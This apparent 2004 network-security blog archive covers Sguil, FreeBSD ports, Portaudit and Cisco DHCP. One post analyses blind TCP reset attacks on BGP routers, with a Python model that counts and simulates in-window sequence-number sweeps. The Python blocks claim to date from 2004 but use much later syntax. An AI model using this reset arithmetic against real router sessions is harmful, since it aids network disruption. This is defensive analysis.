Friday, April 30, 2004

Review of MySQL Tutorial Posted

Amazon.com just posted my five star review of MySQL Tutorial. From the review:

"MySQL is the database used by many commercial and open source security products. Although the user is often 'shielded' from interacting with the database directly, it's important and sometimes crucial to know basic MySQL administration.

MySQL Tutorial is the perfect companion to any security tool which depends on a MySQL database. For example, no one seriously expects to collect large amounts of data with Sguil and Snort unless a MySQL or similar database is working in the background. MySQL Tutorial gives the right details on the right subjects for those running integrated MySQL databases."

This book has a cover price of $29.99. It is refreshing to see a 267 page book priced appropriately, especially since you can get it for less than $20 at buy.com.

Thursday, April 29, 2004

Sguil 0.4.0 Released

Bamm released Sguil 0.4.0 yesterday. The changes are worth reading, but the major addition is the option to replace stream4 keepstats output with John Curry's open source SANCP (Security Analyst Network Connection Profiler) session data. SANCP is much more robust as it can track TCP, UDP, and ICMP, whereas stream4 only watched TCP. In this respect SANCP is like Argus. You can also tell the Sguil components a specified IP address to which they should bind. This facilitates the deployment of Sguil components in FreeBSD jails.

Tuesday, April 27, 2004

Fixing a Problematic Port

While trying to upgrade installed ports on a FreeBSD 4.9 STABLE machine, I encountered a problem with x11-fonts/libXft:

[Updating the pkgdb in /var/db/pkg ... - 125 packages found (-1 +0) (...) done]
---> Installing the new version via the port
===> Installing for libXft-2.1.6
===> libXft-2.1.6 depends on shared library: fontconfig.1 - found
===> libXft-2.1.6 depends on shared library: X11.6 - found
===> Generating temporary packing list
===> Checking if x11-fonts/libXft already installed
===> An older version of x11-fonts/libXft is already installed (Xft-2.1.2_1)
You may wish to ``make deinstall'' and install this port again
by ``make reinstall'' to upgrade it properly.
If you really wish to overwrite the old port of x11-fonts/libXft
without deleting it first, set the variable "FORCE_PKG_REGISTER"
in your environment or the "make install" command line.
*** Error code 1

Stop in /usr/ports/x11-fonts/libXft.
*** Error code 1

Stop in /usr/ports/x11-fonts/libXft.
** Command failed [exit code 1]: /usr/bin/script -qa /tmp/portupgrade6761.0 make reinstall
egrep: /var/db/pkg/libXft-2.1.5_1/+CONTENTS: No such file or directory
---> Restoring the old version
** Fix the installation problem and try again.
[Updating the pkgdb in /var/db/pkg ... - 126 packages found (-0 +1) . done]
** Listing the failed packages (*:skipped / !:failed)
! x11-fonts/libXft (libXft-2.1.5_1) (install error)
---> Packages processed: 0 done, 0 ignored, 0 skipped and 1 failed

I decided to use pkgdb -F to identify and fix problems:

janney:/var/db/pkg# pkgdb -F
---> Checking the package registry database
Duplicated origin: x11-fonts/libXft - Xft-2.1.2_1 libXft-2.1.5_1
Unregister any of them? [no] yes
Unregister Xft-2.1.2_1 keeping the installed files intact? [no] yes
-> libXft-2.1.5_1 is kept.
--> Saving the Xft-2.1.2_1's +CONTENTS file as /var/db/pkg/libXft-2.1.5_1/+CONTENTS.Xft-2.1.2_1
--> Unregistering Xft-2.1.2_1
--> Done.
[Updating the pkgdb in /var/db/pkg ... - 125 packages found (-1 +0) (...) done]
Stale dependency: firefox-0.8_4 -> Xft-2.1.2_1 (x11-fonts/libXft):
Fixed. (-> libXft-2.1.5_1)

Then I tried upgrading libXft again:

janney:/var/db/pkg# portupgrade -v libXft
---> Session started at: Tue, 27 Apr 2004 14:10:38 -0400
---> Upgrade of x11-fonts/libXft started at: Tue, 27 Apr 2004 14:10:42 -0400
---> Upgrading 'libXft-2.1.5_1' to 'libXft-2.1.6' (x11-fonts/libXft)
---> Build of x11-fonts/libXft started at: Tue, 27 Apr 2004 14:10:42 -0400
---> Building '/usr/ports/x11-fonts/libXft'
===> Cleaning for gettext-0.13.1_1
...edited...
===> Registering installation for libXft-2.1.6
===> Cleaning for gettext-0.13.1_1
===> Cleaning for gmake-3.80_2
===> Cleaning for imake-4.3.0_2
===> Cleaning for pkgconfig-0.15.0_1
===> Cleaning for freetype2-2.1.7_3
===> Cleaning for expat-1.95.7
===> Cleaning for fontconfig-2.2.2,1
===> Cleaning for XFree86-libraries-4.3.0_7
===> Cleaning for libXft-2.1.6
---> Removing the temporary backup files
---> Installation of x11-fonts/libXft ended at: Tue, 27 Apr 2004 14:11:42 -0400 (consumed 00:00:11)
---> Cleaning out obsolete shared libraries
[Updating the pkgdb in /var/db/pkg ... - 125 packages found (-0 +1) . done]
---> Upgrade of x11-fonts/libXft ended at: Tue, 27 Apr 2004 14:11:44 -0400 (consumed 00:01:02)
---> Listing the results (+:done / -:ignored / *:skipped / !:failed)
+ x11-fonts/libXft (libXft-2.1.5_1)
---> Packages processed: 1 done, 0 ignored, 0 skipped and 0 failed
---> Session ended at: Tue, 27 Apr 2004 14:11:46 -0400 (consumed 00:01:07)

It looks like it worked.

Review of WarDriving Posted

It's been a long time since my last book review, but I've been busy finishing and copyediting my own book. Thankfully the long flights to and from Vancouver for CanSecWest gave me some reading time. I spent part of that time with WarDriving, which I gave three stars. From the review:

"If you want to learn how to wardrive using Kismet or NetStumbler (and variants), WarDriving is for you. The book does a good job debunking certain myths, such as the prevalence of 'warchalking' or the widespread use of 'Pringles can antennas.' I found the practical advice, like disabling the TCP/IP stack on Windows prior to wardriving, especially helpful. The authors constantly advocate a professional mindset towards wardriving and do not suggest unethical use of insecure wireless networks."

Saturday, April 24, 2004

Comments on TCP Reset Worries

I attended Paul Watson's talk at CanSecWest this week on "Slipping in the Window" (.ppt slides, .doc paper). Paul was inspired by last year's Black Hat 2003 Las Vegas talk "BGP Vulnerability Testing" by Matthew Franz & Sean Convery (.pdf original talk). I attended that presentation as well, and found Matt and Sean's conclusion to be accurate: why bother with lower layer attacks when you can own the router? In other words, so many routers are misconfigured that it's not necessary to resort to spoofing or other elaborate games to disrupt global routing.

Paul decided to focus on the likelihood of successful reset attacks against routers speaking BGP. He found that Matt and Sean's estimates for the time needed to guess the right TCP sequence number to reset a TCP connection were overstated. Matt and Sean did not take into account TCP receive windows: a reset with any sequence number within the receive window is accepted by the target, so an attacker only has to step through the 32-bit sequence space in window-sized increments rather than one value at a time. This makes it easier to reset a persistent connection, and TCP implementations with large windows are even easier to disrupt.

Matt and Sean posted an updated version of their paper acknowledging Paul's findings (.pdf).

A well-written advisory by the UK's NISCC states "an established connection will abort by sending a RST if it receives a duplicate SYN packet with initial sequence number within the TCP window." This means tearing down established connections can be done with SYN packets, not just RST packets.

Cisco published an advisory titled TCP Vulnerabilities in Multiple IOS-Based Cisco Products explaining the issue and listing fixes. It's important to note that since Cisco IOS 10.2 (very old!), IOS rate-limits RST packets by default. According to Cisco, "in the case of a storm of RST packets, they are effectively limited to one packet per second." This countermeasure effectively renders Paul's reset attack too slow to be workable. However, SYN packets are not rate-limited.

Cisco's rate limiting is not the only way to mitigate this attack. Anti-spoofing measures and not letting arbitrary traffic inject itself between BGP-speaking routers are other countermeasures.

I don't foresee the Internet dying at any time in the near future due to this discovery. Owning the target routers would probably be easier. Remember this is mainly a threat to persistent connections. No one is going to kill your Web browsing sessions with this sort of attack, but they would make your life miserable if you tried to download an .iso via FTP. Of course, how are attackers going to know what sessions to target?
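To make the window argument concrete, here is a short Python model I added for this post (it is not code from Paul's paper or from the Cisco advisory). It implements the RFC 793 sequence-number acceptability test with wraparound, compares the exact-match assumption behind the original estimate with in-window acceptance, counts the segments a blind attacker must send when stepping by the window size, and converts that count into time under a sending rate such as Cisco's default of one RST per second. It assumes the attacker already knows the connection's 4-tuple; the window sizes and rates in the main block are illustrative values, not measurements.

```python
"""Blind TCP reset arithmetic: exact-match vs in-window acceptance.

Added illustration for this post; the numbers are computed here, not taken
from Watson's paper or the Cisco advisory.
"""
import math

SEQ_SPACE = 2 ** 32  # size of the TCP sequence number space


def seq_in_window(seg_seq, rcv_nxt, rcv_wnd):
    """RFC 793 acceptability test for a segment's sequence number:
    rcv_nxt <= seg_seq < rcv_nxt + rcv_wnd, computed modulo 2**32 so the
    comparison survives sequence number wraparound."""
    return (seg_seq - rcv_nxt) % SEQ_SPACE < rcv_wnd


def reset_accepted(seg_seq, rcv_nxt, rcv_wnd, exact_match_only=False):
    """Does the receiver tear down the connection for a RST (or, per the
    NISCC advisory, a duplicate SYN) carrying seg_seq?

    exact_match_only=True is the assumption behind the original time
    estimate; False is what RFC 793 stacks actually do, which is the point
    of Watson's talk."""
    if exact_match_only:
        return seg_seq == rcv_nxt
    return seq_in_window(seg_seq, rcv_nxt, rcv_wnd)


def worst_case_guesses(rcv_wnd, exact_match_only=False):
    """Segments needed to be certain of a hit, stepping the guessed sequence
    number by rcv_wnd (or by 1 if the receiver only accepts an exact match).
    Assumes the attacker already knows the 4-tuple of the connection."""
    step = 1 if exact_match_only else rcv_wnd
    return math.ceil(SEQ_SPACE / step)


def blind_reset(rcv_nxt, rcv_wnd, exact_match_only=False):
    """Simulate the sweep against a receiver whose window starts at rcv_nxt.
    Returns (segments_sent, sequence_number_that_was_accepted).  Stepping by
    the window size guarantees a hit because consecutive guesses are never
    more than rcv_wnd apart on the sequence circle."""
    step = 1 if exact_match_only else rcv_wnd
    for k in range(worst_case_guesses(rcv_wnd, exact_match_only)):
        seg_seq = (k * step) % SEQ_SPACE
        if reset_accepted(seg_seq, rcv_nxt, rcv_wnd, exact_match_only):
            return k + 1, seg_seq
    raise RuntimeError("the sweep covers the whole space; this cannot happen")


def seconds_at_rate(segments, segments_per_second):
    """How long the sweep takes once a rate limit (e.g. Cisco's default of
    one RST per second) or the attacker's bandwidth caps the sending rate."""
    return segments / segments_per_second


if __name__ == "__main__":
    # Illustrative window sizes and rates (assumptions, not measurements).
    for wnd in (8192, 16384, 65536):
        n = worst_case_guesses(wnd)
        print("window %6d: %9d segments worst case; %8.1f h at 1 pps, %6.1f s at 5000 pps"
              % (wnd, n, seconds_at_rate(n, 1) / 3600, seconds_at_rate(n, 5000)))
    print("exact match only: %d segments" % worst_case_guesses(65536, exact_match_only=True))
    sent, seq = blind_reset(rcv_nxt=1_000_000, rcv_wnd=16384)
    print("receiver at rcv_nxt=1000000, window 16384: hit after %d segments (seq %d)"
          % (sent, seq))
```

The two receiver models differ by a factor equal to the window size: with a 16 KB window the sweep is a quarter of a million segments instead of four billion, which is feasible at line rate and hopeless at one packet per second, which is exactly why the default IOS RST rate limit matters and why unlimited SYNs are the more worrying variant.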

Incidentally, while browsing Cisco's site I learned their IOS Upgrade Planner and Feature Navigator appear to be working again.

Update: Raven Adler spoke to the DC Security Geeks on 27 April about the BGP issue. Her talk was professional and informative. She worked on the same issue several years before Paul Watson's discoveries. She reported being involved in an incident response where an intruder physically attached a rogue laptop to a public peering point switch to disrupt and/or inject routing.

Thursday, April 22, 2004

Lightning Talk is a Go at CanSecWest

I just finished delivering my lightning talk at the CanSecWest conference in beautiful Vancouver, BC. I spoke for five minutes on Sguil. My slightly updated slides are available in .pdf form here.

Sunday, April 18, 2004

How to Renew DHCP IP Address with Cisco Router?

If anyone can help me with this, I would appreciate it.

I can't figure out how to have my Cisco router renew its DHCP lease with my cable ISP. I appear to not be the only person with this problem. I don't have any ACLs which would deny DHCP traffic, either.

This is the portion of my router config where I set up DHCP on the external interface:

interface FastEthernet0/0
ip address dhcp
ip access-group 101 in
ip nat outside
ip route-cache flow
duplex auto
speed auto
no cdp enable

Eventually my lease expires and I have to disable DHCP on fa0/0 because I can't reach the Internet:

gill#conf term
Enter configuration commands, one per line. End with CNTL/Z.
gill(config)#int fa0/0
gill(config-if)#no ip address dhcp

Upon issuing these commands my router releases its IP address, as seen with Tcpdump:

17:51:51.097987 68.50.168.243.68 > 172.30.100.36.67: xid:0x2570
C:68.50.168.243 ether 0:c:ce:4e:53:a0 vend-rfc1048
DHCP:RELEASE SID:172.30.100.36 CID:"cisco-000c.ce4e.53a0-Fa0/0"
[len 27] T99:115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97.48.47.48.255.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0

When I re-enable DHCP, my box receives a new IP:

gill(config-if)#ip address dhcp
gill(config-if)#^Z
gill#
17w6d: %SYS-5-CONFIG_I: Configured from console by console

Here's what Tcpdump sees. First we have the DHCP server answering another client on the shared cable segment (note the different transaction ID and client MAC, 0:c:41:52:e4:72, which is offered a 10.71.136.x address) and advertising what looks like a cable modem config file:

17:53:05.028597 10.71.136.1.67 > 255.255.255.255.68: xid:0x88291bab flags:0x8000
Y:10.71.136.74 S:172.30.100.35 G:10.71.136.1 ether 0:c:41:52:e4:72
file "mbefcmu10v2_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 SM:255.255.248.0 DG:10.71.136.1
LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:05.121631 10.71.136.1.67 > 255.255.255.255.68: xid:0x88291bab flags:0x8000
Y:10.71.136.74 S:172.30.100.35 G:10.71.136.1 ether 0:c:41:52:e4:72
file "mbefcmu10v2_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 SM:255.255.248.0 DG:10.71.136.1
LT:1209600 TZ:-18000 TS:172.30.100.35

Next my router asks for an IP from its unknown 0.0.0.0 address to the local broadcast 255.255.255.255 address:

17:53:07.180465 0.0.0.0.68 > 255.255.255.255.67: xid:0x1e7e flags:0x8000
ether 0:c:ce:4e:53:a0 vend-rfc1048 DHCP:DISCOVER MSZ:1152
CID:"cisco-000c.ce4e.53a0-Fa0/0"[len 27]
T99:115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97.
48.47.48.12.4.103.105.108.108.55.8.1.6.15.44.3.33.150.43.52.1.3.255.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0

Now it seems the DHCP server tries to ping the proposed address, and then offers an IP:

17:53:07.197072 172.30.100.36 > 68.50.168.243: icmp: echo request (DF)

17:53:07.298545 10.71.136.1.67 > 255.255.255.255.68: xid:0x1e7e flags:0x8000
Y:68.50.168.243 S:172.30.100.35 G:68.50.168.1 ether 0:c:ce:4e:53:a0
file "mdcm245_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 SM:255.255.254.0 DN:"manass01.va.comcast.net"
NS:68.48.0.13,68.87.96.15,68.48.0.5,68.87.96.16 DG:68.50.168.1 LT:604800

My box then sends a DHCP REQUEST for the offered address (the earlier packet was a DISCOVER). I thought this was a duplicate until I noticed the longer "T99" field.

17:53:07.300195 0.0.0.0.68 > 255.255.255.255.67: xid:0x1e7e flags:0x8000
ether0:c:ce:4e:53:a0 vend-rfc1048 DHCP:REQUEST MSZ:1152
CID:"cisco-000c.ce4e.53a0-Fa0/0"[len 27]
T99:115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97.
48.47.48.54.4.172.30.100.36.50.4.68.50.168.243.51.4.0.9.58.128.12.4.103.105.1
08.108.55.8.1.6.15.44.3.33.150.43.52.1.3.255.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0

17:53:07.317881 10.71.136.1.67 > 255.255.255.255.68: xid:0x1e7e flags:0x8000
Y:68.50.168.243 S:172.30.100.35 G:68.50.168.1 ether 0:c:ce:4e:53:a0
file "mdcm245_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 SM:255.255.254.0 DN:"manass01.va.comcast.net"
NS:68.48.0.13,68.87.96.15,68.48.0.5,68.87.96.16 DG:68.50.168.1 LT:604800

17:53:07.319116 arp reply 68.50.168.243 is-at 0:c:ce:4e:53:a0

17:53:07.599113 10.71.136.1.67 > 255.255.255.255.68: xid:0x7b7aa96 flags:0x8000
Y:10.71.137.184 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:ad:20:c4
file "msb4220_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 SM:255.255.248.0
DG:10.71.136.1 LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:07.687973 10.71.136.1.67 > 255.255.255.255.68: xid:0x7b7aa96 flags:0x8000
Y:10.71.137.184 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:ad:20:c4
file "msb4220_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 SM:255.255.248.0
DG:10.71.136.1 LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:16.265276 arp who-has 68.50.168.1 tell 68.50.168.243

17:53:16.272724 arp reply 68.50.168.1 is-at 0:3:fe:e3:8:70

17:53:16.420161 10.71.136.1.67 > 255.255.255.255.68: xid:0xffffa114 flags:0x8000
Y:10.71.116.208 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:1b:a1:14
file "msb4100_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 VO:128 SM:255.255.254.0
DG:10.71.116.1 LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:16.511679 10.71.136.1.67 > 255.255.255.255.68: xid:0xffffa114 flags:0x8000
Y:10.71.116.208 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:1b:a1:14
file "msb4100_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 VO:128 SM:255.255.254.0
DG:10.71.116.1 LT:1209600 TZ:-18000 TS:172.30.100.35

When everything is squared away I can ping my gateway:

17:53:16.609622 68.50.168.243 > 68.50.168.1: icmp: echo request

17:53:16.616916 68.50.168.1 > 68.50.168.243: icmp: echo reply

I obviously haven't figured out what all of this is, but I wanted to document it for future reference. It appears Cisco has a new command in 12.3 to release and renew DHCP addresses differently.
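The "T99" field that makes the DISCOVER and REQUEST look different is worth decoding. My reading of the byte values (an interpretation added here, not something tcpdump or Cisco states) is that the old tcpdump mis-parsed the Cisco client identifier, so the bytes following the identifier's tail "sco-000c.ce4e.53a0-Fa0/0" are ordinary RFC 2132 code/length/value options. The Python below, added for this post, parses the two dumps copied from the trace above (line wraps rejoined, trailing zero padding shortened) and shows that the REQUEST carries the requested address, the server identifier and a lease time of 604800 seconds, matching the OFFER's LT field.

```python
"""Decode the DHCP options that tcpdump printed as an opaque "T99" byte dump.

Added illustration for this post; not code from Cisco, the ISP or tcpdump.
"""
import struct
from ipaddress import IPv4Address

# Byte dumps copied from the DISCOVER and REQUEST packets in the trace
# (line wraps rejoined, trailing zero padding shortened).
DISCOVER_T99 = (
    "115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97."
    "48.47.48.12.4.103.105.108.108.55.8.1.6.15.44.3.33.150.43.52.1.3.255."
    "0.0.0.0.0.0.0.0"
)
REQUEST_T99 = (
    "115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97."
    "48.47.48.54.4.172.30.100.36.50.4.68.50.168.243.51.4.0.9.58.128.12.4.103.105."
    "108.108.55.8.1.6.15.44.3.33.150.43.52.1.3.255."
    "0.0.0.0.0.0.0.0"
)
# Tail of the client identifier "cisco-000c.ce4e.53a0-Fa0/0" that tcpdump
# swallowed into the T99 field (assumption: tcpdump mis-parsed option 61).
CID_TAIL = b"sco-000c.ce4e.53a0-Fa0/0"

OPTION_NAMES = {
    1: "Subnet Mask", 3: "Router", 6: "Domain Name Server", 12: "Host Name",
    15: "Domain Name", 33: "Static Route", 43: "Vendor Specific",
    44: "NetBIOS Name Server", 50: "Requested IP Address",
    51: "IP Address Lease Time", 52: "Option Overload", 53: "DHCP Message Type",
    54: "Server Identifier", 55: "Parameter Request List",
    57: "Maximum DHCP Message Size", 61: "Client Identifier",
    150: "TFTP Server Address (Cisco)",
}


def dump_to_bytes(dump):
    """Turn tcpdump's dotted decimal byte list into bytes."""
    return bytes(int(tok) for tok in dump.strip(".").split("."))


def decode_value(code, value):
    """Decode the option value according to its RFC 2132 type."""
    if code in (50, 54):
        return str(IPv4Address(value))          # 4-byte address
    if code == 51:
        return struct.unpack("!I", value)[0]    # seconds, big-endian
    if code == 57:
        return struct.unpack("!H", value)[0]
    if code in (12, 15):
        return value.decode("ascii")
    if code == 55:
        return list(value)                      # requested option codes
    if code in (52, 53):
        return value[0]
    return value.hex()                          # unknown: leave as hex


def parse_options(data):
    """Walk RFC 2132 TLV options: 0 is a one-byte PAD, 255 is END, anything
    else is code, length, value.  Raises ValueError on a truncated option or
    a list that never reaches END."""
    opts = {}
    i = 0
    while i < len(data):
        code = data[i]
        if code == 0:
            i += 1
            continue
        if code == 255:
            break
        if i + 1 >= len(data):
            raise ValueError("truncated option header at offset %d" % i)
        length = data[i + 1]
        value = data[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d claims %d bytes, %d present" % (code, length, len(value)))
        opts[code] = decode_value(code, value)
        i += 2 + length
    else:
        raise ValueError("no END (255) option found")
    return opts


def decode_t99(dump, cid_tail=CID_TAIL):
    """Strip the swallowed client-identifier tail, then parse the options."""
    raw = dump_to_bytes(dump)
    if not raw.startswith(cid_tail):
        raise ValueError("dump does not begin with the expected client-identifier tail")
    return parse_options(raw[len(cid_tail):])


def describe(opts):
    """Map option codes to readable names for printing."""
    return {OPTION_NAMES.get(code, "option %d" % code): val for code, val in opts.items()}


if __name__ == "__main__":
    for label, dump in (("DISCOVER", DISCOVER_T99), ("REQUEST", REQUEST_T99)):
        print(label)
        for name, val in describe(decode_t99(dump)).items():
            print("  %-28s %s" % (name, val))
```

The DISCOVER only carries the hostname "gill", the parameter request list and an option-overload flag; the REQUEST adds option 54 (server 172.30.100.36), option 50 (68.50.168.243) and option 51 (604800 seconds), which is what distinguishes the two "T99" blobs.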

Calculating Security ROI Is a Waste of Time

I was pleased to read Infosec Economics by Lawrence Gordon and Robert Richardson in the 1 Apr 04 issue of Network Computing magazine. This duo says:

"ROI (or bang for the buck) can't be applied perfectly to information security because often the return on information security purchases and deployments is intangible. Sure, companies invest in some solutions that offer benefits beyond security--faster network throughput in a new router that supports VPNs, for example--and they can calculate the ROI of these indirect benefits. But security requires factoring in the expectation of loss."

I've been lucky to have never been tasked with calculating security's "return on investment," because I would have told my supervisor the answer is zero. There is no return to be made on security, because security is a loss avoidance and loss mitigation measure. Security is a way to deal with risk, which is the probability of loss. (I dealt with these definitions in Oct 04.)

"Investing" in security is not like investing in a more efficient metal-bending machine or sending an employee to a training class. Donald Trump does not receive any return on the investment he makes in bodyguards. All he does is provide a means to lessen the probability of bodily harm. He is not a more efficient businessman as a result of having bodyguards.

Obviously people value security, but it must be balanced against the threats one faces and the consequences of loss. Presidential candidates only receive Secret Service protection once they appear to be their party's nominee. Private citizens do not usually employ bodyguards. We make these decisions all the time, but because digital security is an art with opaque threats, we have trouble choosing the appropriate level of security for our networks. Those who perform network security monitoring are more aware of these threats than the average CISO. NSM operators possess network awareness, thanks to the sorts of information they collect.

Economists have appreciated this fact for years. It looks like the 2004 CSI/FBI study will avoid ROI in favor of discussing net present value (NPV) and security as an externality. Stay tuned.

Friday, April 16, 2004

Tips on Network Hardware from Snort-Inline Mailing List

I'm trying to figure out if it's possible to build a FreeBSD-based filtering bridge running Snort-inline.

I submitted this question to see if anyone has FreeBSD and Snort-inline working. I just got this response from Alex Dupre:

"The bridge doesn't support the divert socket and will not support it. We are working on a different approach to use snort in inline mode on a bridge, but there isn't an ETA (surely not soon)."

While perusing the snort-inline-users mailing list I found this thread. It pointed me to makers of interesting network equipment. Emerging Technologies makes multi-port failover cards like the 2 port NIC pictured above.

Shore Microsystems also makes failover devices, except these are independent appliances like the SM-2500.

I have no personal experience with these devices, but the posters in the snort-inline list seemed to like them. I note them here as a reference in the event I may need a similar product in the future.

I'm considering buying a Cyclades-TS100 remote access device. AcmeMicro sells them for a little more than $300. I'd like to have remote access via either Ethernet or dial-up.

Update: Scott Bald of Shore Microsystems asked me to mention newer products which exceed the features of the SM 2500 mentioned above, specifically the SM 2501 and the SM 2512.

Interface Bonding on FreeBSD

The question of how to combine traffic seen by two physical network interfaces into a single virtual interface is popular on the various IDS lists I watch. Below is the script I use to create a ngeth0 interface using the FreeBSD ng_eth netgraph node:

bourque:/$ cat /usr/local/etc/rc.d/001.bond.sh
#!/bin/sh -x
# sf2 and sf3 are real interfaces which receive tap outputs; ngeth0 is created by ngctl

# ng_ether must be loaded so netgraph can "see" the real interfaces sf2 and sf3
kldload ng_ether

# bring up the real interfaces
ifconfig sf2 promisc -arp up
ifconfig sf3 promisc -arp up

# create ngeth0 and bind sf2 and sf3 to it
ngctl mkpeer . eiface hook ether
ngctl mkpeer ngeth0: one2many lower one
ngctl connect sf2: ngeth0:lower lower many0
ngctl connect sf3: ngeth0:lower lower many1

# bring up ngeth0 for sniffing duties
ifconfig ngeth0 -arp up

Linux has a channel bonding page at Sourceforge.

I devote an entire chapter of my book on how to get access to traffic on the wire, with instructions for SPAN ports, inline bridging devices, and the like.

Remember that creating virtual interfaces is one way to deal with the two TX outputs from traditional taps, like the Net Optics 10/100 Ethernet Tap. Their new 10/100 Ethernet Port Aggregator Tap offers a single TX output with RAM to buffer the original two TX lines.

Earthlink Study Measures Spyware Infections

NWFusion informed me of an interesting Earthlink.net press release. Earthlink reported the results of their customers running Webroot's Spy Audit program. This is a Windows executable which a user must download and run. Earthlink offers their own download, elsypaudit-i386-windows-all-2004.0.133.0.0.10.exe, which may be the same program, although the file sizes are fairly different.

Looking through strings output, I found a reference to http://spyauditresults.earthlink.net/index.php, which appears to be the results page once a scan is done.

I usually use Spybot Search & Destroy on Windows PCs used by friends and family. I also used the Microsoft Update CD-ROM on systems with only dial-up modems.

The Earthlink study found an average of 28 instances of spyware per audited host. They also found over 184,000 installations of "system monitors," which Earthlink defines as programs that "can capture virtually everything you do on your computer, from keystrokes, emails, and chat room dialogue to which sites you visit and which programs you run." That sounds like Earthlink identified over 184,000 0wn3d Windows systems.

Thursday, April 15, 2004

Using Portaudit to Improve FreeBSD Security

I've started using the security/portaudit port to check the security status of FreeBSD's applications, so I thought I'd document my findings. Portaudit uses the Vulnerability and eXposure Markup Language, "an XML application for documenting security issues in a software package collection" like the FreeBSD ports system. You can browse the FreeBSD or OpenBSD VuXML pages to see vulnerabilities recorded since the VuXML project began in late 2003.

Using the VuXML database is as simple as installing the Portaudit port. Be sure to have an up-to-date ports tree (perhaps by using net/cvsup as documented here). Install Portaudit, and then run it as shown to check installed packages for problems. The -F flag tells Portaudit to fetch a new copy of the vulnerability database, while -a says check all installed ports/packages.

moog:/root# portaudit -F -a
>> Attempting to fetch from ftp://ftp.jp.FreeBSD.org/pub/FreeBSD/ports/local-distfiles/eik/.
new database installed.
Affected package: racoon-20040116a
Type of problem: racoon remote denial of service vulnerability (ISAKMP header length field).
Reference: ccd698df-8e20-11d8-90d1-0020ed76ef5a.html

Affected package: racoon-20040116a
Type of problem: racoon remote denial of service vulnerability (IKE Generic Payload Header).
Reference: 40fcf20f-8891-11d8-90d1-0020ed76ef5a.html

Affected package: racoon-20040116a
Type of problem: racoon fails to verify signature during Phase 1.
Reference: d8769838-8814-11d8-90d1-0020ed76ef5a.html

Affected package: racoon-20040116a
Type of problem: tcpdump ISAKMP payload handling remote denial-of-service.
Reference: f8551668-de09-4d7b-9720-f1360929df07.html

4 problem(s) in your installed packages found.

You are advised to update or deinstall the affected package(s) immediately.

At this point, since Portaudit found problems in security/racoon, we should upgrade that port immediately.

If Portaudit reports a clean bill of health, it looks like this:

moog:/root# portaudit -F -a
>> Attempting to fetch from ftp://ftp.jp.FreeBSD.org/pub/FreeBSD/ports/local-distfiles/eik/.
Receiving auditfile.tbz (4040 bytes): 100%
4040 bytes transferred in 0.2 seconds (19.51 kBps)
new database installed.
0 problem(s) in your installed packages found.

Portaudit works with sysutils/pkg_install-devel to warn sys admins when they try to install vulnerable software. In the following example, I try to install Ethereal using an out-of-date ports tree. The Ethereal port wants to install version 0.10.0a, which has multiple problems.

janney:/usr/ports/net/ethereal# make
===> ethereal-0.10.0a_2 has known vulnerabilities:
>> multiple vulnerabilities in ethereal.
Reference: cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html
>> Please update your ports tree and try again.
*** Error code 1

Stop in /usr/ports/net/ethereal.

Portaudit can be used to check the status of a port before it is installed. Here we check for vulnerabilities in the Racoon port. By passing Portaudit the -C flag, we tell it to compare that specific port with the VuXML database.

janney:/usr/ports/security/racoon# portaudit -C

Port racoon-20040116a (security/racoon) should be marked FORBIDDEN:
- http://people.freebsd.org/~eik/portaudit/ccd698df-8e20-11d8-90d1-0020ed76ef5a.html
- http://people.freebsd.org/~eik/portaudit/40fcf20f-8891-11d8-90d1-0020ed76ef5a.html
- http://people.freebsd.org/~eik/portaudit/d8769838-8814-11d8-90d1-0020ed76ef5a.html
- http://people.freebsd.org/~eik/portaudit/f8551668-de09-4d7b-9720-f1360929df07.html

If we ran 'portaudit -A' in the /usr/ports directory, Portaudit would check for vulnerabilities in the entire ports tree.
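To show what Portaudit is doing when it matches installed packages against the VuXML database, here is a small Python checker I added for this post. It is not Portaudit's own code. It parses a constructed VuXML fragment (the vid values, topics and version ranges are made up for illustration and are not real FreeBSD entries), splits installed package names of the form name-version at the last hyphen, and compares versions using a simplified form of the FreeBSD PORTVERSION_PORTREVISION,PORTEPOCH rules: epoch first, then dotted numeric components with trailing letters sorting after the bare number (so 0.10.0a is newer than 0.10.0), then revision.

```python
"""Toy VuXML checker in the spirit of portaudit -a.

Added illustration for this post; not the Portaudit code itself.  The
version comparison is a simplification of pkg_version(1) that covers the
package names seen on this page.
"""
import re
import xml.etree.ElementTree as ET

NS = {"v": "http://www.vuxml.org/2004/vuxml"}

# Constructed sample database.  The vids, topics and ranges are invented for
# illustration and are not the real FreeBSD VuXML entries.
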